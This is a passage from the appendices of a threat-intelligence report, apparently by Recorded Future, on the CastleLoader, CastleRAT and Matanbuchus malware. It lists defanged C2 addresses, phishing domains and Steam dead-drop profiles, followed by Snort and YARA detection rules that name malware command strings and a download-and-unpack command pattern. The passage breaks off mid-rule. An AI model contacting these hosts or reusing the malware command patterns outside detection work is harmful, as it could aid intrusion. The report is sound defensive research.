            <div>2025-07-18</div>
            <div>2025-11-06</div>
            <div>Found via Google</div>
          </div>
          <div>
            <div>her-op[.]com</div>
            <div>185[.]39[.]19[.]180</div>
            <div>2025-06-24</div>
            <div>2025-06-24</div>
            <div>Domain used in “Completed processing task” log, per the DOM</div>
          </div>
          <div>
            <div>77[.]83[.]207[.]55</div>
            <div>2025-06-25</div>
            <div>2025-06-25</div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix F: Steam Community Profiles and their Corresponding C2 Domains, alongside the IP Addresses that Hosted the C2 domains</h2>
        <div>
          <div>
            <div><strong>Steam Community Profile Link</strong></div>
            <div><strong>C2 Domain</strong></div>
            <div><strong>IP Address</strong></div>
          </div>
          <div>
            <div>hxxps://steamcommunity[.]com/id/tfy5d6gohu8tgy687r7</div>
            <div>
              <p>tdbfvgwe456yt[.]com</p>
              <p>miteamss[.]com</p>
            </div>
            <div>45[.]134[.]26[.]41<br />91[.]202[.]233[.]132<br />91[.]202[.]233[.]250</div>
          </div>
          <div>
            <div>hxxps://steamcommunity[.]com/id/desdsfds34324y3g</div>
            <div>
              <p>gabesworld[.]com</p>
              <p>autryjones[.]com</p>
            </div>
            <div>
              <p>194[.]76[.]227[.]242</p>
              <p>46[.]28[.]67[.]22<br />195[.]211[.]97[.]51</p>
            </div>
          </div>
          <div>
            <div>hxxps://steamcommunity[.]com/id/fio34h8dsh3iufs</div>
            <div>treetankists[.]com</div>
            <div>45[.]11[.]181[.]59</div>
          </div>
          <div>
            <div>hxxps://steamcommunity[.]com/id/jeg238r7staf378s</div>
            <div>kakapupuneww[.]com</div>
            <div>45[.]135[.]232[.]149</div>
          </div>
          <div>
            <div>hxxps://steamcommunity[.]com/id/krouvhsin34287f7h3</div>
            <div>justnewdmain[.]com<br /><br />programsbookss[.]com</div>
            <div>
              <p>192[.]109[.]138[.]102</p>
              <p>185[.]208[.]158[.]250</p>
              <p>178[.]17[.]57[.]102</p>
              <p>64[.]52[.]80[.]121</p>
              <p>45[.]32[.]69[.]11</p>
              <p>67[.]217[.]228[.]198</p>
              <p>192[.]153[.]57[.]125</p>
            </div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix G: Booking.com-Themed Infrastructure Linked to Cluster 3</h2>
        <div>
          <div>
            <div><strong>Domain</strong></div>
            <div><strong>IP Address</strong></div>
            <div><strong>First Seen</strong></div>
            <div><strong>Last Seen</strong></div>
          </div>
          <div>
            <div>bioskbd[.]com</div>
            <div>178[.]17[.]57[.]103</div>
            <div>2025-09-23</div>
            <div>2025-09-29</div>
          </div>
          <div>
            <div>blkiesf[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-25</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>boikfrs[.]com</div>
            <div>178[.]17[.]57[.]103</div>
            <div>2025-09-22</div>
            <div>2025-09-29</div>
          </div>
          <div>
            <div>boiksal[.]com</div>
            <div>178[.]17[.]57[.]103</div>
            <div>2025-09-04</div>
            <div>2025-09-10</div>
          </div>
          <div>
            <div>bookingnewprice109034[.]icu</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>bookingnewprice204167[.]icu</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-20</div>
          </div>
          <div>
            <div>guest-request16433[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>guest-request44565494[.]com</div>
            <div>178[.]17[.]57[.]103</div>
            <div>2025-09-05</div>
            <div>2025-09-07</div>
          </div>
          <div>
            <div>guest-request64533[.]com</div>
            <div>178[.]17[.]57[.]103</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>guest-request666543[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>guest-request677653[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>guest-update666532345[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>hotelroomprice1039375[.]icu</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>info-guest44567645[.]com</div>
            <div>Cloudflare</div>
            <div>2025-08-28</div>
            <div>2025-09-03</div>
          </div>
          <div>
            <div>info676345677[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>newmessage10294[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-09</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>request-info3444[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-15</div>
            <div>2025-09-21</div>
          </div>
          <div>
            <div>request-info4433345[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>request345553[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-15</div>
            <div>2025-09-22</div>
          </div>
          <div>
            <div>request44456776[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-22</div>
          </div>
          <div>
            <div>update-gues3429[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-15</div>
            <div>2025-09-21</div>
          </div>
          <div>
            <div>update-guest4398317809[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-14</div>
            <div>2025-09-17</div>
          </div>
          <div>
            <div>update-info14546[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>update-info3458421[.]com</div>
            <div>Cloudflare</div>
            <div>2025-09-25</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>update-info4467[.]com</div>
            <div>Cloudflare</div>
            <div>2025-10-06</div>
            <div>2025-10-21</div>
          </div>
          <div>
            <div>update-info4468765[.]com</div>
            <div>Cloudflare</div>
            <div>2025-08-25</div>
            <div>2025-09-03</div>
          </div>
          <div>
            <div>update-info539156[.]com</div>
            <div>Cloudflare</div>
            <div>2025-08-24</div>
            <div>2025-09-02</div>
          </div>
          <div>
            <div>update-info71556[.]com</div>
            <div>Cloudflare</div>
            <div>2025-08-28</div>
            <div>2025-09-03</div>
          </div>
          <div>
            <div>update-reques898665[.]com</div>
            <div>Cloudflare</div>
            <div>2025-08-21</div>
            <div>2025-09-02</div>
          </div>
        </div>
        <p><em>(Source: Recorded Future)</em></p>
        <h2>Appendix H: Indicators of Compromise (IoCs)</h2>
        <div>
          <div>
            <div>
              <pre><code>CastleRAT C2 IP Addresses:
5[.]35[.]44[.]176
34[.]72[.]90[.]40
45[.]11[.]180[.]174
45[.]11[.]180[.]198
45[.]11[.]181[.]59
45[.]32[.]69[.]11
45[.]61[.]136[.]81
45[.]134[.]26[.]41
45[.]135[.]232[.]149
45[.]144[.]53[.]62
46[.]28[.]67[.]22
64[.]52[.]80[.]121
66[.]63[.]187[.]224
67[.]217[.]228[.]198
77[.]90[.]153[.]43
77[.]238[.]241[.]203
79[.]132[.]130[.]148
79[.]132[.]131[.]200
85[.]192[.]49[.]6
85[.]208[.]84[.]115
87[.]120[.]93[.]167
91[.]202[.]233[.]132
91[.]202[.]233[.]250
94[.]141[.]122[.]164
102[.]135[.]95[.]102
104[.]225[.]129[.]171
144[.]208[.]126[.]50
168[.]100[.]8[.]84
178[.]17[.]57[.]102
178[.]17[.]57[.]153
185[.]125[.]50[.]125
185[.]149[.]146[.]118
185[.]156[.]248[.]24
185[.]196[.]9[.]80
185[.]196[.]9[.]222
185[.]196[.]10[.]8
185[.]196[.]11[.]171
185[.]208[.]158[.]250
192[.]109[.]138[.]102
192[.]153[.]57[.]125
194[.]76[.]227[.]242
195[.]85[.]115[.]44
195[.]149[.]146[.]118
195[.]201[.]108[.]189
195[.]211[.]97[.]51

CastleRAT C2 Domains:
autryjones[.]com
gabesworld[.]com
justnewdmain[.]com
kakapupuneww[.]com
miteamss[.]com
programsbookss[.]com
tdbfvgwe456yt[.]com
treetankists[.]com

Steam Community URLs:
hxxps[://]steamcommunity[.]com/id/desdsfds34324y3g
hxxps[://]steamcommunity[.]com/id/fio34h8dsh3iufs
hxxps[://]steamcommunity[.]com/id/jeg238r7staf378s
hxxps[://]steamcommunity[.]com/id/krouvhsin34287f7h3
hxxps[://]steamcommunity[.]com/id/tfy5d6gohu8tgy687r7

CastleLoader C2 IP Addresses:
31[.]58[.]50[.]160
31[.]58[.]87[.]132
45[.]11[.]183[.]19
45[.]11[.]183[.]45
45[.]11[.]183[.]165
45[.]155[.]249[.]121
80[.]77[.]25[.]88
80[.]77[.]25[.]114
80[.]77[.]25[.]239
107[.]158[.]128[.]26
147[.]45[.]177[.]127
170[.]130[.]165[.]201
172[.]86[.]90[.]58
173[.]44[.]141[.]52
185[.]121[.]234[.]141

CastleLoader C2 Domains:
alafair[.]net
anotherproject[.]icu
bethschwier[.]com
campanyasoft[.]com
castlppwnd[.]com
donttouchme[.]life
donttouchthisisuseless[.]icu
doyoureallyseeme[.]icu
dpeformse[.]com
icantseeyou[.]icu
oldspicenotsogood[.]shop
rcpeformse[.]com
roject0[.]com
speatly[.]com
touchmeplease[.]icu
wereatwar[.]com

Additional Domains:
albafood[.]shop
albalk[.]lol
bdeskthebest[.]shop
bestproxysale[.]shop
bestvpninfo[.]shop
chessinthenight[.]lol
clgenetics[.]shop
docusign[.]homes
dubaialbafood[.]shop
easyadvicesforyou[.]shop
easyprintscreen[.]shop
funjobcollins[.]shop
nort-secure[.]shop
norton-secure[.]shop
notstablecoin[.]xyz
notusdt[.]lol
nvidblog[.]shop
nvldlainfoblog[.]shop
oldspicenotsogood[.]shop
starkforeveryone[.]lol
sweetdevices[.]lol
testdomain123123[.]shop
tradeviewdesktop[.]shop
tradlngview-desktop[.]biz
tradlngvlewdesktop[.]shop
tradview-desktop[.]shop
vipcinemade[.]shop
vipcinemadubai[.]shop
vipdubaicinema[.]shop

Cluster 1 (TAG-160) Logistics-Themed Domains:
cdlfreightlogistics[.]com
dperforms[.]info
englandloglstics[.]com
englanglogistlcs[.]com
hometownlogisticsllc[.]com
leemanlogisticsinc[.]com
loadplannig[.]com
loads[.]icu
loadsplanning[.]com
loadsschedule[.]com
loadstracking[.]com
loadstrucking[.]com
mcentireinc[.]com
mcloads[.]com
mlxfreightinc[.]com
mrlogsol[.]ca
pinaccletruckllc[.]com
rateconfirmations[.]com
redlightninglogistics[.]com
redlightninglogisticsinc[.]com
starshiplogisticsgroupllc[.]com
tenderloads[.]com
trucksscheduling[.]com

Cluster 1 (TAG-160) IP Addresses Hosting Logistics-Themed Domains:
74[.]119[.]239[.]234
78[.]153[.]155[.]131
162[.]215[.]230[.]96
162[.]215[.]230[.]150
162[.]215[.]241[.]46
162[.]215[.]241[.]215
162[.]251[.]80[.]108
185[.]236[.]20[.]154
192[.]124[.]178[.]74
199[.]79[.]62[.]141
204[.]11[.]58[.]80
207[.]174[.]212[.]141

Matanbuchus C2 IP Addresses:
185[.]39[.]19[.]164

Matanbuchus C2 Domains:
galaxioflow[.]com
mechiraz[.]com
nicewk[.]com
nimbusvaults[.]com

Cluster 2 (TAG-161) Booking.com-Themed Domains:
checkinastayverify[.]com
checkinistayverify[.]com
checkinstayverify[.]com
checkistayverify[.]com
checksstayverify[.]com
checkystayverify[.]com
confirmahotelastay[.]com
confirmahotelstay[.]com
confirmhotelestay[.]com
confirmhotelistay[.]com
confirmhotelystay[.]com
confirmstayon[.]com
confirmstayonline[.]com
confirmyhotelstay[.]com
guestaformahub[.]com
guestaformhub[.]com
guestaformsafe[.]com
guestaportalverify[.]com
guestaverifyportal[.]com
guestformahub[.]com
guestformasafe[.]com
guestformhub[.]com
guestformsafe[.]com
guestistayhotel[.]com
guestportalverify[.]com
gueststayhotel[.]com
guestverifyhub[.]com
guestverifylink[.]com
guestverifyportal[.]com
guestystayhotel[.]com
guesutastayhotel[.]com
guesytastayhotel[.]com
hoteliguestverify[.]com
hotelistayverify[.]com
hotelyguestverify[.]com
hotelystayverify[.]com
nedpihotel[.]com
pilolhotel[.]com
roomiverifaccess[.]com
roomverifaccess[.]com
roomverifiaccess[.]com
servicehotelonline[.]com
verifihubguest[.]com
verifyhubguest[.]com

Cluster 2 (TAG-161) IP Addresses Hosting Booking.com-Themed Domains:
77[.]83[.]207[.]55
185[.]39[.]19[.]180
185[.]39[.]19[.]181

Other Domains Linked to Cluster 2 (TAG-161):
cik-ed[.]com
cut-gv[.]com
dip-bo[.]com
dok-ol[.]com
dut-cd[.]com
eta-cd[.]com
eto-sa[.]com
fir-vp[.]com
for-es[.]com
gir-vc[.]com
gut-bk[.]com
her-op[.]com
ipk-sa[.]com
itp-ce[.]com
kil-it[.]com
kip-er[.]com
mac-ig[.]com
map-nv[.]com
ned-uj[.]com
otr-gl[.]com
pit-kp[.]com
rol-vd[.]com
site-bila[.]com
site-here[.]com
site-reto[.]com
site-tilo[.]com
site-wila[.]com
spu-cr[.]com
tam-cg[.]com
uke-sd[.]com
uki-fa[.]com
wal-ik[.]com
xut-uv[.]com
xyt-ko[.]com
ykl-vh[.]com
yt-ko[.]com
zit-fl[.]com

Proxy IP Addresses Linked to Cluster 2 (TAG-161):
109[.]104[.]153[.]29
109[.]104[.]153[.]100
109[.]104[.]153[.]193
109[.]104[.]154[.]67

Additional IP Addresses Linked to Phishing Email Management Tooling:
80[.]64[.]18[.]245
85[.]208[.]84[.]65
88[.]214[.]50[.]83
185[.]39[.]19[.]94

Cluster 3 Booking.com-Themed Domains:
bioskbd[.]com
blkiesf[.]com
boikfrs[.]com
boiksal[.]com
bookingnewprice109034[.]icu
bookingnewprice204167[.]icu
guest-request16433[.]com
guest-request44565494[.]com
guest-request64533[.]com
guest-request666543[.]com
guest-request677653[.]com
guest-update666532345[.]com
hotelroomprice1039375[.]icu
info-guest44567645[.]com
info676345677[.]com
justnewdmain[.]com
newmessage10294[.]com
programsbookss[.]com
request-info3444[.]com
request-info4433345[.]com
request345553[.]com
request44456776[.]com
update-gues3429[.]com
update-guest4398317809[.]com
update-info14546[.]com
update-info3458421[.]com
update-info4467[.]com
update-info4468765[.]com
update-info539156[.]com
update-info71556[.]com
update-reques898665[.]com

Cluster 3 IP Addresses Hosting Booking.com-Themed Domains:
178[.]17[.]57[.]103
192[.]109[.]138[.]102
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix I: Snort Rules for CastleLoader</h2>
        <div>
          <div>
            <div>
              <pre><code>alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleLoader Malware Outbound Checkin"; flow:established,to_server; content:"GET"; http_method; urilen:82,norm; content:"|2F|service|2F|settings|2F|"; http_uri; fast_pattern; content:"Cache-Control|3A 20|no-cache|0D 0A|Connection|3A 20|Keep-Alive|0D 0A|Pragma|3A 20|no-cache|0D 0A|User-Agent|3A 20|"; http_header; depth:79; content:"Host|3A 20|"; http_header; distance:0;  content:!"Accept"; http_header; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost\x3a\x20[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460302; rev:1; metadata:author MGUT, created_at 2025-07-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleLoader Malware Outbound Payload Request"; flow:established,to_server; content:"GET"; http_method; content:"|2F|service|2F|download|2F|"; http_uri; fast_pattern; content:"Cache-Control|3A 20|no-cache|0D 0A|Connection|3A 20|Keep-Alive|0D 0A|Pragma|3A 20|no-cache|0D 0A|User-Agent|3A 20|"; http_header; depth:79; content:"Host|3A 20|"; http_header; distance:0;  content:!"Accept"; http_header; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost\x3a\x20[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460303; rev:1; metadata:author MGUT, created_at 2025-07-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleLoader Malware Stager Outbound Payload Request"; flow:established,to_server; content:"GET"; http_method; content:"|2F|service|2F|download|2F|"; http_uri; depth:18; fast_pattern; content:".bin"; http_uri; content:"GoogeBot"; http_user_agent; depth:8; isdataat:0,relative; reference:url,https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview; classtype:trojan-activity; sid:52460304; rev:1; metadata:author MGUT, created_at 2025-08-12, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control, triage_family castleloader, deployment triage;)

alert tcp $EXTERNAL_NET 79 -&gt; $HOME_NET any (msg:"CastleLoader Malware Inbound Command Retrieval via Finger Service"; flow:established,to_client; content:"Login|3A 20|"; depth:7; content:"Plan|3A|"; distance:0; content:"%random%"; fast_pattern; distance:0; content:"|20|--tlsv1.2|20|-L|20|-o|20|"; distance:0; content:"|0D 0A|mkdir|20|"; distance:0; content:"|0D 0A|tar|20|"; distance:0; reference:url,https://tria.ge/251110-zcgvkstpck; classtype:trojan-activity; sid:52460334; rev:2; metadata:author MGUT, created_at 2025-10-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix J: Snort Rules for CastleRAT</h2>
        <div>
          <div>
            <div>
              <pre><code>alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|02 56 77 8E A5 83 D7 05 02 C2 1E D9 70 5A 47 E5 11 92 B5 5A|"; fast_pattern; depth:20; reference:url,https://tria.ge/250808-w4hpeaxtcw; classtype:trojan-activity; sid:52460307; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|BF CF 04 82 45 DF 4F 09 55 5E 0B 15 9F E2 91 A0 68 51 1E 87|"; fast_pattern; depth:20; reference:url,https://tria.ge/250814-wyqstsyjx3; classtype:trojan-activity; sid:52460308; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|6B 13 5C 08 BD 49 59 75 79 62 4E EA 2F DE 57 F4 6E 08 8B 6B|"; fast_pattern; depth:20; reference:url,https://tria.ge/250219-nsbsqazpep; classtype:trojan-activity; sid:52460309; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|56 EA 59 DB 6B DD 36 81 42 01 C6 84 DF 5A 6B E8 38 14 8D 07|"; fast_pattern; depth:20; reference:url,https://tria.ge/250505-wmbvjabk3t; classtype:trojan-activity; sid:52460310; rev:1; metadata:author MGUT, created_at 2025-08-18, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|A8 CF 1E 1D BA 27 49 FB 63 38 F4 52 A7 9C 39 CF 4A 85 E5 5B|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460311; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|0F 0D F7 66 4C B2 D5 12 BA 55 CC BB 2E 1B F4 AD C0 E0 7C A2|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-rt355svtfs; classtype:trojan-activity; sid:52460312; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|74 6F D9 7F B5 48 F6 91 26 E0 16 5A 81 29 4F 35 21 6C 61 82|"; fast_pattern; depth:20; reference:url,https://tria.ge/250813-a7c3fadl7z; classtype:trojan-activity; sid:52460313; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|61 57 7C E8 EE BE 56 71 B3 98 F4 A6 87 E3 0C 39 50 0C 29 41|"; fast_pattern; depth:20; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460314; rev:1; metadata:author MGUT, created_at 2025-08-22, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"CastleRAT Malware Outbound Handshake"; flow:established,to_server; dsize:20; stream_size:server,=,1; content:"|4D 58 29 58 84 15 1B 1D 2A D9 80 90 5C 36 1C A0 43 05 80 48|"; fast_pattern; depth:20; reference:url,https://tria.ge/250701-v6911aykv9; classtype:trojan-activity; sid:52460335; rev:1; metadata:author MGUT, created_at 2025-10-30, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Possible CastleRAT Python Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:19,norm; content:"|2F|line|2F 3F|fields|3D|16385"; http_uri; depth:19; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250808-w4hpeaxtcw; classtype:trojan-activity; sid:52460315; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147457"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250822-vwt7ssxly9; classtype:trojan-activity; sid:52460316; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server;  content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147505"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_raw_header; depth:48; reference:url,https://tria.ge/250814-wyqstsyjx3; classtype:trojan-activity; sid:52460317; rev:1; metadata:author MGUT, created_at 2025-08-24, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert http $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api"; flow:established,to_server; content:"GET"; http_method; urilen:20,norm; content:"|2F|line|2F 3F|fields|3D|147489"; http_uri; depth:20; fast_pattern; content:"Connection|3A 20|Keep-Alive|0D 0A|Host|3A 20|www.ip-api.com|0D 0A 0D 0A|"; http_header; depth:48; reference:url,https://tria.ge/251028-27bcds1nbk; classtype:trojan-activity; sid:52460333; rev:1; metadata:author MGUT, created_at 2025-10-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix K: Snort Rules for Matanbuchus</h2>
        <div>
          <div>
            <div>
              <pre><code>alert udp $EXTERNAL_NET any -&gt; $HOME_NET any (msg:"Matanbuchus Loader Inbound DNS Tunneled Data ACK"; content:"|AA AA 85 80 00 01 00 01 00 00 00 00 01 30 14|"; fast_pattern; depth:15; content:"|10|"; distance:20; within:1; content:"|00 10 00 01 00 00 00 3C 00 03 02|ok"; distance:0; isdataat:!1,relative; reference:url,https://www.morphisec.com/blog/ransomware-threat-matanbuchus-3-0-maas-levels-up; reference:url,https://tria.ge/250716-b5sksa1wgt; sid:52460327; rev:1; metadata:author MGUT, created_at 2025-09-30, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg:"Matanbuchus Loader Malware Outbound C2 Communication"; flow:established,to_server; content:"POST|20|"; depth:5; content:"|2E|php"; distance:0; content:"1|0D 0A|User-Agent|3A 20|"; distance:0; content:"Host|3A 20|"; distance:0; content:"Content-Length|3A 20|"; distance:0; content:"Content-Type|3A 20|application|2F|x-www-form-urlencoded|0D 0A|Accept-Language|3A 20|"; distance:0; content:"|0D 0A 0D 0A|"; content:!"|26|"; distance:0; content:"|3D|ey"; fast_pattern; distance:0; pcre:"/User\x2dAgent[^\x0d]+\x0d\x0aHost[^\x0d]+\x0d\x0aContent\x2dLength[^\x0d]+\x0d\x0aContent\x2dType[^\x0d]+\x0d\x0aAccept\x2dLanguage[^\x0d]+\x0d\x0a\x0d\x0a/"; reference:url,https://tria.ge/240328-t4ge8sbf65; classtype:bad-unknown; sid:52460167; rev:1; metadata:author MGUT, created_at 2024-03-29, mitre_tactic_id TA0011, mitre_tactic_name Command-And-Control;)
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix L: Yara Rule for CastleLoader</h2>
        <div>
          <div>
            <div>
              <pre><code>rule MAL_CastleLoader {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-06"
        description = "Detection of the CastleLoader malware executable"
        version = "1.0"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        hash = "1b6befc65b19a63b4131ce5bcc6e8c0552fe1e1d136ab94bc7d81b3924056156"
        hash = "202f6b6631ade2c41e4762e5877ce0063a3beabce0c3f8564b6499a1164c1e04"
        hash = "25e0008aba82690e0f58c9d9fcfbc5d49820aa78d2f7bfcd0b85fb969180fc04"
        hash = "b45cce4ede6ffb7b6f28f75a0cbb60e65592840d98dcb63155b9fa0324a88be2"
        hash = "fb9de7448e9e30f717c171f1d1c90ac72828803a16ad385757aeecc853479d3c"
        hash = "6444f0e3f78254aef663837562d258a2236a77f810ee8d832de7d83e0fdd5783"
        malware = "CastleLoader"
        malware_id = "8RF9P9"
        category = "MALWARE"
    strings:
        $vmware_check = { 3D 56 4D 77 61 75 ?? 81 7D F8 72 65 56 4D 0F 85 ?? ?? ?? ?? 81 7D F4 77 61 72 65 }
        $api_hashing = { 0F BE 0C 1E 8B C2 F6 C3 01 75 0F C1 E8 03 0F AF C1 8B CA C1 E1 07 33 C1 }
        $stack_str_url = { C7 ?5 [1-4] 74 00 74 00 C7 ?5 [1-4] 69 00 6E 00 C7 ?5 [1-4] 67 00 73 00 }
        $mov_edx_apihash1 = { BA 44 A0 2D 39 } // CreateMutexW
        $mov_edx_apihash2 = { BA 2B C2 86 58 } // GetLastError
        $mov_edx_apihash3 = { BA 94 F9 86 F8 } // RtlAllocateHeap
        $mov_edx_apihash4 = { BA B2 48 70 60 } // ExitProcess
    condition:
        uint16(0) == 0x5A4D and all of them
}
</code></pre>
            </div>
          </div>
        </div>
        <h2>Appendix M: Yara Rules for CastleRAT</h2>
        <div>
          <div>
            <div>
              <pre><code>rule MAL_CastleRAT_Python {
    meta:
        author = "Insikt Group, Recorded Future"
        date = "2025-08-18"
        description = "Detection of the python variant of CastleRAT malware"
        version = "1.0"
        reference = "https://www.recordedfuture.com/ko/research/from-castleloader-to-castlerat-tag-150-advances-operations"
        reference = "https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation"
        reference = "https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview"
        hash = "94dc0f696a46f3c225b0aa741fbd3b8997a92126d66d7bc7c9dd8097af0de52a"
        hash = "53775af67e9df206ed3f9c0a3756dbbc4968a77b1df164e9baddb51e61ac82df"
        malware = "CastleRAT"
        malware_id = "9WCga-"
        category = "MALWARE"
        actor = "TAG-150"
        actor_id = "9nk6DO"
    strings:
        $cmd1 = "S_CONNECT" fullword
        $cmd2 = "S_COMMAND" fullword
        $cmd3 = "S_PING" fullword
        $cmd4 = "S_CMD" fullword
        $cmd5 = "S_DELETE" fullword
        $cmd6 = "S_POWERSHELL" fullword
        $cmd7 = "S_START_TERMINAL" fullword
        $cmd8 = "S_SESSION_MESSAGE" fullword
        $cmd9 = "S_UPLOAD" fullword
        $fun1 = "CheckElevation():" fullword
        $fun2 = "GetHWID("
        $fun3 = "GetOS("
        $fun4 = "GetIpGeo("
